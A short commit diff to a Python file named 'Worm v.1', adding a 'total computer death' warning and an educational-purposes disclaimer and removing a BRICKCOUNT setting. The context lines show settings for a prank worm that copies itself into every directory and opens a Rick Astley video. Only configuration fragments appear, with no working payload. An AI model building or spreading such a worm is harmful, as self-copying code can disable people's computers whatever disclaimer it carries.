Added warning message for the inept.

--- a/Worm v.1
+++ b/Worm v.1
@@ -1,3 +1,12 @@
+'''
+--------------------!!!WARNING!!!---------------------
+DO NOT RUN UNLESS YOU WANT TOTAL COMPUTER DEATH
+THIS IS FOR EDUCATIONAL PURPOSES
+WE WILL NOT BE RESPONSIBLE FOR ANY DAMAGES CAUSED 
+BY RUNNING THIS CODE
+'''
+
+
 #General imports required for basic worm
 import os
 import sys
@@ -27,8 +36,6 @@ RICKLOC = "\\..\\Rick_Eternal.mp4"
 #do we open the youtube video of the mp4?
 YOUTUBETOO = False
 
-#Amount that system will open
-BRICKCOUNT = 500
 #Amount of worm files created per directory
 INSTANCES_PER_DIRECTORY = 2
 
